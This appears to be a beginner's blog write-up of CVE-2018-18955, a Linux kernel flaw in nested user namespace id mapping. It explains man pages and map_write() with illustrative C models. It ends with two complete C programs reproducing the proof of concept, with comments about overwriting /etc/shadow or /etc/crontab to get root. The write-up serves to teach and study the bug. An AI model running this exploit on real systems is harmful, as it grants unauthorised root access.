there are no posts about this cve as far as i know, and the original advisory is just too difficult for newbies like me, so...
warm up
what's a user namespace
let's assume you use linux: man user_namespaces will give you what you need
in case you aren't familiar with linux namespaces, man namespaces says:
Namespace   Constant          Isolates
Cgroup      CLONE_NEWCGROUP   Cgroup root directory
IPC         CLONE_NEWIPC      System V IPC, POSIX message queues
Network     CLONE_NEWNET      Network devices, stacks, ports, etc.
Mount       CLONE_NEWNS       Mount points
PID         CLONE_NEWPID      Process IDs
User        CLONE_NEWUSER     User and group IDs
UTS         CLONE_NEWUTS      Hostname and NIS domain name
in particular, user namespaces:
User namespaces isolate security-related identifiers and attributes, in particular, user IDs and group IDs (see credentials(7)), the root directory, keys (see keyrings(7)), and capabilities (see capabilities(7)). A process's user and group IDs can be different inside and outside a user namespace. In particular, a process can have a normal unprivileged user ID outside a user namespace while at the same time having a user ID of 0 inside the namespace; in other words, the process has full privileges for operations inside the user namespace, but is unprivileged for operations outside the namespace.
CVE-2018-18955 (i'm gonna call it the cve) relies on nested user namespaces, so here's some info about nested user ns:
User namespaces can be nested; that is, each user namespace—except the initial ("root") namespace— has a parent user namespace, and can have zero or more child user namespaces. The parent user namespace is the user namespace of the process that creates the user namespace via a call to unshare(2) or clone(2) with the CLONE_NEWUSER flag.
and what's uid/gid mapping
the cve uses a broken uid/gid mapping to achieve local privilege escalation (LPE), so first we have to get a basic understanding of id mapping
from man newuidmap, we get this:
uid
    Beginning of the range of UIDs inside the user namespace.
loweruid
    Beginning of the range of UIDs outside the user namespace.
count
    Length of the ranges (both inside and outside the user namespace).
for loweruid, there's a file /etc/subuid, which sets the limit for loweruid:
newuidmap verifies that the caller is the owner of the process indicated by pid and that for each of the above sets, each of the UIDs in the range [loweruid, loweruid+count] is allowed to the caller according to /etc/subuid before setting /proc/[pid]/uid_map
for me, its like:
so i can create a uid mapping like 0 100000 1000, which maps uids 0..999 inside the ns to uids 100000..100999 outside of it
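to make the three numbers concrete, here's a minimal sketch of how a single mapping line translates ids in both directions. struct extent, map_down(), map_up() and ID_UNMAPPED are names i made up for illustration, they are not the kernel's or newuidmap's code:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One line of a uid_map/gid_map file: "uid loweruid count". */
struct extent {
    uint32_t first;       /* start of the range inside the namespace */
    uint32_t lower_first; /* start of the range outside the namespace */
    uint32_t count;       /* length of both ranges */
};

#define ID_UNMAPPED ((uint32_t)-1) /* hypothetical "no mapping" marker */

/* Translate an id seen inside the namespace to the id outside of it. */
static uint32_t map_down(const struct extent *e, uint32_t id)
{
    assert(e != NULL);
    if (id < e->first || id - e->first >= e->count)
        return ID_UNMAPPED;
    return e->lower_first + (id - e->first);
}

/* Translate an id seen outside the namespace to the id inside of it. */
static uint32_t map_up(const struct extent *e, uint32_t id)
{
    assert(e != NULL);
    if (id < e->lower_first || id - e->lower_first >= e->count)
        return ID_UNMAPPED;
    return e->first + (id - e->lower_first);
}
```

with the extent {0, 100000, 1000}, map_down() turns uid 0 into 100000, and map_up() turns 100500 back into 500. anything outside the 1000-id window comes back as ID_UNMAPPED.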
analysis of cve-2018-18955
the culprit
from the original advisory, we know that it's commit 6397fac4915a that causes the cve, so we check it out:
here's the fix:
find the corresponding source file, kernel/user_namespace.c, locate map_write(), and see what it does:
in the first loop, insert_extent() inserts every extent of the mapping being written into new_map, which has the type struct uid_gid_map
an extent is one entry of an id mapping (first, lower_first, count), and a mapping can hold more than one of them. here's an example with 6 extents:
0 0 1
1 1 1
2 2 1
3 3 1
4 4 1
5 5 995
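a small sketch of reading such a mapping into extents and checking whether it crosses the 5-extent limit (UID_GID_MAP_MAX_BASE_EXTENTS in the kernel). parse_extents(), needs_sorted_arrays() and BASE_EXTENTS are hypothetical helpers of mine, and the real parser in map_write() does far more validation than this:

```c
#include <assert.h>
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct extent {
    uint32_t first;       /* start of the range inside the namespace */
    uint32_t lower_first; /* start of the range in the parent namespace */
    uint32_t count;       /* length of the range */
};

#define BASE_EXTENTS 5 /* assumption: mirrors UID_GID_MAP_MAX_BASE_EXTENTS */

/* Parse "first lower_first count" lines; returns how many extents were read. */
static size_t parse_extents(const char *text, struct extent *out, size_t max)
{
    size_t n = 0;
    int used = 0;

    assert(text != NULL && out != NULL);
    while (n < max) {
        struct extent e;
        /* %n stores how many characters were consumed, so we can advance */
        if (sscanf(text, "%" SCNu32 " %" SCNu32 " %" SCNu32 "%n",
                   &e.first, &e.lower_first, &e.count, &used) != 3)
            break;
        out[n++] = e;
        text += used;
    }
    return n;
}

/* More than 5 extents means the sorted forward/reverse arrays get used. */
static int needs_sorted_arrays(size_t nr_extents)
{
    return nr_extents > BASE_EXTENTS;
}
```

feeding it the 6 lines above gives 6 extents, which is one more than the limit, and that is exactly what the bug needs.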
then sort_idmaps() is called to sort new_map's two arrays of mappings (new_map->forward, new_map->reverse)
UID_GID_MAP_MAX_BASE_EXTENTS is 5, you can find it in the struct uid_gid_map screenshot.
when the count of extents (map->nr_extents) exceeds 5, sort_idmaps() sorts both arrays, for bsearch() later
the two arrays represent the two directions of id mapping, as the original advisory says:
binary search over a sorted array of struct uid_gid_extent is used. Because ID mappings are queried in both directions (kernel ID to namespaced ID and namespaced ID to kernel ID), two copies of the array are created, one per direction, and they are sorted differently.
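here's a rough userspace sketch of that idea: one copy sorted by the in-namespace id, one copy sorted by the lower id, and a bsearch() over each. all the names (sort_both(), ns_to_lower(), lower_to_ns(), the comparators) are mine, and this only illustrates the data layout, it is not the kernel's sort_idmaps():

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct extent { uint32_t first, lower_first, count; };

#define ID_UNMAPPED ((uint32_t)-1) /* hypothetical "no mapping" marker */

/* qsort comparators: forward array by first, reverse array by lower_first */
static int cmp_forward(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;
    return (x->first > y->first) - (x->first < y->first);
}

static int cmp_reverse(const void *a, const void *b)
{
    const struct extent *x = a, *y = b;
    return (x->lower_first > y->lower_first) - (x->lower_first < y->lower_first);
}

/* bsearch comparators: is the key id below, inside or above this extent? */
static int key_in_forward(const void *key, const void *elem)
{
    uint32_t id = *(const uint32_t *)key;
    const struct extent *e = elem;
    if (id < e->first)
        return -1;
    return (id - e->first >= e->count) ? 1 : 0;
}

static int key_in_reverse(const void *key, const void *elem)
{
    uint32_t id = *(const uint32_t *)key;
    const struct extent *e = elem;
    if (id < e->lower_first)
        return -1;
    return (id - e->lower_first >= e->count) ? 1 : 0;
}

/* Build both sorted copies; the reverse one starts as a copy of the forward one. */
static void sort_both(const struct extent *in, size_t n,
                      struct extent *fwd, struct extent *rev)
{
    assert(in != NULL && fwd != NULL && rev != NULL);
    memcpy(fwd, in, n * sizeof(*in));
    qsort(fwd, n, sizeof(*fwd), cmp_forward);
    memcpy(rev, fwd, n * sizeof(*fwd));
    qsort(rev, n, sizeof(*rev), cmp_reverse);
}

static uint32_t ns_to_lower(const struct extent *fwd, size_t n, uint32_t id)
{
    const struct extent *e = bsearch(&id, fwd, n, sizeof(*fwd), key_in_forward);
    return e ? e->lower_first + (id - e->first) : ID_UNMAPPED;
}

static uint32_t lower_to_ns(const struct extent *rev, size_t n, uint32_t id)
{
    const struct extent *e = bsearch(&id, rev, n, sizeof(*rev), key_in_reverse);
    return e ? e->first + (id - e->lower_first) : ID_UNMAPPED;
}
```

the point to take away: the two arrays hold the same extents in different orders, so whatever is done to the values in one of them has to be done to the other as well.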
after sorting, every extent of new_map goes through the second loop
map_id_range_down() does the following:
in this loop, the lower_first (starting id in the parent ns) of each extent in new_map (which will be our nested ns later) is replaced with the id that parent_map maps it down to. in other words, lower_first now holds a kernel id
after map_id_range_down(), the new_map->forward array has had its lower_first values replaced with the new ones, but the new_map->reverse array remains untouched
let's rethink what map_write() does
given the id mapping of the parent ns and the map to write, map_write() inserts each extent into new_map and sorts both of its arrays, then maps the lower_first of each extent in new_map->forward to a kernel id, while the new_map->reverse array is left untouched. in this process, parent_map provides the way up to the kernel, via its own lower_first
the reverse mapping, which maps kernel ids to the ns, stays exactly what sort_idmaps() produced
yes, new_map->reverse is generated by sort_idmaps() in the following way:
it's a copy of the forward array, just sorted differently
as the sorting happens before the "mapping to kernel" loop, the reverse mapping is never actually processed, and map_write() installs the new map anyway. as a result, we have a broken id mapping in the new ns, where the kernel to ns mapping is just the unprocessed copy of the ns to kernel (forward) mapping, still holding parent ns ids instead of kernel ids.
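say we write a uid range of 0..1000 as the mapping to install in the nested ns. according to the analysis above, the kernel to ns uid mapping will also end up covering 0..1000, so kernel uids like 0 (the real root) look mapped in our ns even though the parent ns never owned them. thus, something unexpected is about to happen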
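the whole thing can be replayed in userspace. below is a toy model of the ordering problem, assuming the parent ns was set up with 0 100000 1000 and the nested ns writes the 6-extent mapping from before. write_map(), lookup_down(), lookup_up() and the fixed flag are all my own invention, sorting is left out because it doesn't matter for the result, and only the start of each range is translated. it's a sketch of the logic, not the kernel code:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MAX_EXTENTS 16
#define ID_UNMAPPED ((uint32_t)-1) /* hypothetical "no mapping" marker */

struct extent { uint32_t first, lower_first, count; };

struct idmap {
    size_t nr;
    struct extent forward[MAX_EXTENTS]; /* ns id -> kernel id */
    struct extent reverse[MAX_EXTENTS]; /* kernel id -> ns id */
};

/* ns id -> lower id (linear search, for simplicity) */
static uint32_t lookup_down(const struct extent *ext, size_t n, uint32_t id)
{
    for (size_t i = 0; i < n; i++)
        if (id >= ext[i].first && id - ext[i].first < ext[i].count)
            return ext[i].lower_first + (id - ext[i].first);
    return ID_UNMAPPED;
}

/* lower id -> ns id */
static uint32_t lookup_up(const struct extent *ext, size_t n, uint32_t id)
{
    for (size_t i = 0; i < n; i++)
        if (id >= ext[i].lower_first && id - ext[i].lower_first < ext[i].count)
            return ext[i].first + (id - ext[i].lower_first);
    return ID_UNMAPPED;
}

/* fixed == 0 replays the bug, fixed != 0 also translates the reverse copy */
static void write_map(struct idmap *m, const struct extent *req, size_t n,
                      const struct extent *parent, size_t parent_n, int fixed)
{
    assert(m != NULL && n <= MAX_EXTENTS);
    m->nr = n;
    memcpy(m->forward, req, n * sizeof(*req));

    /* step 1: the reverse array is created as a copy of the forward one */
    memcpy(m->reverse, m->forward, n * sizeof(*req));

    /* step 2: lower_first goes from parent ns ids to kernel ids */
    for (size_t i = 0; i < n; i++) {
        m->forward[i].lower_first =
            lookup_down(parent, parent_n, m->forward[i].lower_first);
        if (fixed)
            m->reverse[i].lower_first =
                lookup_down(parent, parent_n, m->reverse[i].lower_first);
    }
}
```

in the buggy mode, lookup_down(m.forward, m.nr, 0) gives 100000 as expected, but lookup_up(m.reverse, m.nr, 0) gives 0, meaning kernel uid 0 appears to be mapped in the nested ns. in the fixed mode, kernel uid 0 is unmapped and 100000 maps back to 0.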
leverage the broken id mapping
according to the reporter of CVE-2018-18955 (jannh@google.com), from_kuid() is used in kuid_has_mapping(), which in turn is used by some capability checking functions such as inode_owner_or_capable() and privileged_wrt_inode_uidgid().
that's where LPE comes in: from_kuid() gives incorrect ids, resulting in incorrect capability checks, which allow an attacker to gain write access to inodes they are not supposed to write
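to see why a wrong reverse lookup turns into a wrong permission decision, here's a heavily simplified model of that kind of check: "the caller holds the capability in its ns AND the inode's owner uid and gid both have a mapping in that ns". every name with a model_ prefix is hypothetical, the same reverse array is used for uids and gids to keep it short, and the real kernel functions take very different arguments:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define ID_UNMAPPED ((uint32_t)-1) /* hypothetical "no mapping" marker */

struct extent { uint32_t first, lower_first, count; };

/* stand-in for from_kuid(): kernel id -> ns id through the reverse array */
static uint32_t model_from_kid(const struct extent *rev, size_t n, uint32_t kid)
{
    assert(rev != NULL);
    for (size_t i = 0; i < n; i++)
        if (kid >= rev[i].lower_first && kid - rev[i].lower_first < rev[i].count)
            return rev[i].first + (kid - rev[i].lower_first);
    return ID_UNMAPPED;
}

/* stand-in for kuid_has_mapping(): is this kernel id visible in the ns? */
static bool model_has_mapping(const struct extent *rev, size_t n, uint32_t kid)
{
    return model_from_kid(rev, n, kid) != ID_UNMAPPED;
}

/* simplified shape of an inode capability check */
static bool model_privileged_over_inode(const struct extent *rev, size_t n,
                                        bool has_cap_in_ns,
                                        uint32_t inode_kuid, uint32_t inode_kgid)
{
    return has_cap_in_ns &&
           model_has_mapping(rev, n, inode_kuid) &&
           model_has_mapping(rev, n, inode_kgid);
}
```

with the broken reverse array (lower_first still 0..999), a file owned by kernel uid 0 and gid 0 passes the check. with a correct one (lower_first starting at 100000), the same file fails it, and only files owned by ids the parent ns really maps pass.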
i have a bunch of screenshots to visualize this process
finally, we are searching in map->reverse, which has been broken from the very beginning (ever since it was written)
proof of concept
you can just check the original advisory for the PoC
here's my screenshot showing how it works
since you can write /etc/shadow, why not just write some cron job to /etc/crontab and be root?
thanks for reading such a boring post. i am gonna show you something even more boring, with comments:
- subuid_shell.c
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
  int sync_pipe[2];
  char dummy;
  // socket pair used to synchronize parent and child
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
    err(1, "socketpair");

  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0) {
    // kill child if parent dies
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    close(sync_pipe[1]);
    // create new ns
    if (unshare(CLONE_NEWUSER))
      err(1, "unshare userns");
    // tell the parent the ns exists, then wait until the id maps are written
    if (write(sync_pipe[0], "X", 1) != 1)
      err(1, "write to sock");
    if (read(sync_pipe[0], &dummy, 1) != 1)
      err(1, "read from sock");
    // set uid and gid to 0, in child ns
    if (setgid(0))
      err(1, "setgid");
    if (setuid(0))
      err(1, "setuid");
    // replace process with bash shell, in which you will see "root",
    // as the setuid(0) call worked
    // this might seem a little confusing, but you are "root" only to this child ns,
    // thus, no permission to the outside ns
    execl("/bin/bash", "bash", NULL);
    err(1, "exec");
  }

  close(sync_pipe[0]);
  // wait until the child has created its ns
  if (read(sync_pipe[1], &dummy, 1) != 1)
    err(1, "read from sock");
  // set id mapping for child process:
  // ids 0..999 inside the ns map to 100000..100999 outside
  char cmd[1000];
  sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
  if (system(cmd))
    errx(1, "denying setgroups failed");
  sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
  if (system(cmd))
    errx(1, "newuidmap failed");
  sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
  if (system(cmd))
    errx(1, "newgidmap failed");
  // let the child continue
  if (write(sync_pipe[1], "X", 1) != 1)
    err(1, "write to sock");

  int status;
  if (wait(&status) != child)
    err(1, "wait");
  return 0;
}
- subshell.c
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <string.h> // strlen()
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
  int sync_pipe[2];
  char dummy;
  // socket pair used to synchronize parent and child
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
    err(1, "socketpair");

  // create a child process
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0) {
    // in child process
    close(sync_pipe[1]);
    // this creates a new (nested) ns
    if (unshare(CLONE_NEWUSER))
      err(1, "unshare userns");
    // tell the parent the ns exists, then wait until the id maps are written
    if (write(sync_pipe[0], "X", 1) != 1)
      err(1, "write to sock");
    if (read(sync_pipe[0], &dummy, 1) != 1)
      err(1, "read from sock");
    // start a bash process (replace process image)
    // this time you are actually root, without the name/id, though
    // technically the root access is not complete,
    // to get complete root, write to /etc/crontab and wait for a root shell to pop up
    execl("/bin/bash", "bash", NULL);
    err(1, "exec");
  }

  close(sync_pipe[0]);
  // wait until the child has created its ns
  if (read(sync_pipe[1], &dummy, 1) != 1)
    err(1, "read from sock");

  char pbuf[100]; // path of the child's /proc directory
  sprintf(pbuf, "/proc/%d", (int)child);
  // cd to /proc/<pid>, where uid_map and gid_map live
  if (chdir(pbuf))
    err(1, "chdir");

  // our new id mapping with 6 extents (> 5 extents)
  const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
  // write the new mapping to uid_map and gid_map
  int uid_map = open("uid_map", O_WRONLY);
  if (uid_map == -1)
    err(1, "open uid map");
  if (write(uid_map, id_mapping, strlen(id_mapping)) != (ssize_t)strlen(id_mapping))
    err(1, "write uid map");
  close(uid_map);
  int gid_map = open("gid_map", O_WRONLY);
  if (gid_map == -1)
    err(1, "open gid map");
  if (write(gid_map, id_mapping, strlen(id_mapping)) != (ssize_t)strlen(id_mapping))
    err(1, "write gid map");
  close(gid_map);

  // let the child continue
  if (write(sync_pipe[1], "X", 1) != 1)
    err(1, "write to sock");

  int status;
  if (wait(&status) != child)
    err(1, "wait");
  return 0;
}